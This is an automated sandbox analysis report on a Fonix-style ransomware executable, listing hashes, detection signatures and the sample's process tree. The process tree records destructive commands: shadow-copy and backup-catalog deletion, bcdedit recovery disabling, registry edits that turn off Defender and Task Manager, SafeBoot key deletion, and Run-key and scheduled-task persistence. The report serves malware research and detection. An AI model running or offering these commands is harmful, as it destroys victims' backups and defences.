Resubmissions

24/10/2022, 14:59

221024-sczbashcfl 10

02/06/2020, 00:13

200602-s5zbncbaen 9

Analysis

  • max time kernel
    146s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    24/10/2022, 14:59

General

  • Target

    de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

  • Size

    6.0MB

  • MD5

    df472f90c33e6c341a74fe1ca29dac70

  • SHA1

    d7512488de06b677751014bdc48302c179542558

  • SHA256

    de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e

  • SHA512

    4257e88d9c6f5eec59d1da6749c386b3859be04159ec37aba2adb3704e5f2ce11ef3adfb086b86d1bea03db300e1d82cab08f266cf6fae4d8f929e71918ddcf9

  • SSDEEP

    196608:6lwfwLOxsdCZOGdRc7lg6MzQk67CU94Dy0q7:wnmF8O+9SQVCU9420a

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
    "C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %temp%/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:940
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1120
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
        3⤵
        • Adds Run key to start application
        PID:1076
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1892
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
        3⤵
        • Adds Run key to start application
        PID:2032
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1064
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
        3⤵
        • Adds Run key to start application
        PID:1408
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
        3⤵
        • Adds Run key to start application
        PID:2000
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
          PID:880
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:676
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          3⤵
            PID:1916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:684
          • C:\Windows\SysWOW64\reg.exe
            reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
            3⤵
              PID:768
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
            2⤵
              PID:1296
              • C:\Windows\SysWOW64\reg.exe
                reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                3⤵
                  PID:1224
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c cmd.exe /c vssadmin Delete Shadows /All /Quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet/ & icacls * /grant Everyone:(OI)(CI)F /T /C /Q
                2⤵
                  PID:1864
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c vssadmin Delete Shadows /All /Quiet
                    3⤵
                      PID:1832
                      • C:\Windows\SysWOW64\vssadmin.exe
                        vssadmin Delete Shadows /All /Quiet
                        4⤵
                        • Interacts with shadow copies
                        PID:1596
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic shadowcopy delete
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1904
                    • C:\Windows\SysWOW64\icacls.exe
                      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
                      3⤵
                      • Modifies file permissions
                      PID:1496
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy Cpriv.key %appdata%\Cpriv.key
                    2⤵
                      PID:1152
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy Cpub.key %appdata%\Cpub.key
                      2⤵
                        PID:1672
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Copy SystemID %appdata%\SystemID
                        2⤵
                          PID:1484
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1756
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 1324 -s 1384
                        1⤵
                        • Program crash
                        PID:1020

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\Cpriv.key

                        Filesize

                        2KB

                        MD5

                        9a26495d34b2ddc44fa334e894f6af12

                        SHA1

                        8f140986da38a7e917c1bd65bddbbba2ac35f387

                        SHA256

                        0e79f6bf382028594e09ff0d88ed1bb4163ce49e1f75a80d7aa10d8e171fe265

                        SHA512

                        0e528bae9256a2570cd5f39762921431dd99ee487fdbb1c139fd57f7c845899a1a013854afdcfcc66084ea662cc2ca6c34766e165a0b412f839f23a6e8449a0b

                      • C:\Users\Admin\AppData\Local\Temp\Cpub.key

                        Filesize

                        292B

                        MD5

                        bc66ec97431049e8212d22eafc2fb6f9

                        SHA1

                        05181f6f734ca3dabce697057282db6a592b05b3

                        SHA256

                        8e958e448fa1ace725bae16621c4e7a59a11e92da6a8d1ce46854f5e26083c28

                        SHA512

                        954468133220ab35678650ac863c289477a32fdca057ee7ac7357836624f6ebdb6d57e0bb2c5bb7ddb22e49d2308a77c93923d1fc3125b532ed2075cd8738106

                      • C:\Users\Admin\AppData\Local\Temp\SystemID

                        Filesize

                        8B

                        MD5

                        d474ac18ca9e6b13a5d96992e3e2cea2

                        SHA1

                        7801c83cfce24e74be1aec01da46e382b59a1d97

                        SHA256

                        67ac2a08674d573e2d8823d66e629f593593d87edef0d4ae71413144fcd0134e

                        SHA512

                        129495ae579cb2d309626dd3eebe7e54f8591c4ba6afe543c9d884facd326bf8bf5cccccf58be5e1e72600e84b27ee08371a2f5c458f417f62fdb013ca93ef8d

                      • C:\Users\Admin\AppData\Roaming\Cpriv.key

                        Filesize

                        2KB

                        MD5

                        9a26495d34b2ddc44fa334e894f6af12

                        SHA1

                        8f140986da38a7e917c1bd65bddbbba2ac35f387

                        SHA256

                        0e79f6bf382028594e09ff0d88ed1bb4163ce49e1f75a80d7aa10d8e171fe265

                        SHA512

                        0e528bae9256a2570cd5f39762921431dd99ee487fdbb1c139fd57f7c845899a1a013854afdcfcc66084ea662cc2ca6c34766e165a0b412f839f23a6e8449a0b

                      • C:\Users\Admin\AppData\Roaming\Cpriv.key

                        Filesize

                        2KB

                        MD5

                        9a26495d34b2ddc44fa334e894f6af12

                        SHA1

                        8f140986da38a7e917c1bd65bddbbba2ac35f387

                        SHA256

                        0e79f6bf382028594e09ff0d88ed1bb4163ce49e1f75a80d7aa10d8e171fe265

                        SHA512

                        0e528bae9256a2570cd5f39762921431dd99ee487fdbb1c139fd57f7c845899a1a013854afdcfcc66084ea662cc2ca6c34766e165a0b412f839f23a6e8449a0b

                      • C:\Users\Admin\AppData\Roaming\Cpub.key

                        Filesize

                        292B

                        MD5

                        bc66ec97431049e8212d22eafc2fb6f9

                        SHA1

                        05181f6f734ca3dabce697057282db6a592b05b3

                        SHA256

                        8e958e448fa1ace725bae16621c4e7a59a11e92da6a8d1ce46854f5e26083c28

                        SHA512

                        954468133220ab35678650ac863c289477a32fdca057ee7ac7357836624f6ebdb6d57e0bb2c5bb7ddb22e49d2308a77c93923d1fc3125b532ed2075cd8738106

                      • C:\Users\Admin\AppData\Roaming\Cpub.key

                        Filesize

                        292B

                        MD5

                        bc66ec97431049e8212d22eafc2fb6f9

                        SHA1

                        05181f6f734ca3dabce697057282db6a592b05b3

                        SHA256

                        8e958e448fa1ace725bae16621c4e7a59a11e92da6a8d1ce46854f5e26083c28

                        SHA512

                        954468133220ab35678650ac863c289477a32fdca057ee7ac7357836624f6ebdb6d57e0bb2c5bb7ddb22e49d2308a77c93923d1fc3125b532ed2075cd8738106

                      • C:\Users\Admin\AppData\Roaming\SystemID

                        Filesize

                        8B

                        MD5

                        d474ac18ca9e6b13a5d96992e3e2cea2

                        SHA1

                        7801c83cfce24e74be1aec01da46e382b59a1d97

                        SHA256

                        67ac2a08674d573e2d8823d66e629f593593d87edef0d4ae71413144fcd0134e

                        SHA512

                        129495ae579cb2d309626dd3eebe7e54f8591c4ba6afe543c9d884facd326bf8bf5cccccf58be5e1e72600e84b27ee08371a2f5c458f417f62fdb013ca93ef8d

                      • memory/1980-93-0x0000000001220000-0x0000000001C48000-memory.dmp

                        Filesize

                        10.2MB

                      • memory/1980-94-0x0000000001220000-0x0000000001C48000-memory.dmp

                        Filesize

                        10.2MB

                      • memory/1980-54-0x0000000001220000-0x0000000001C48000-memory.dmp

                        Filesize

                        10.2MB

                      • memory/1980-58-0x0000000001220000-0x0000000001C48000-memory.dmp

                        Filesize

                        10.2MB

                      • memory/1980-92-0x0000000001220000-0x0000000001C48000-memory.dmp

                        Filesize

                        10.2MB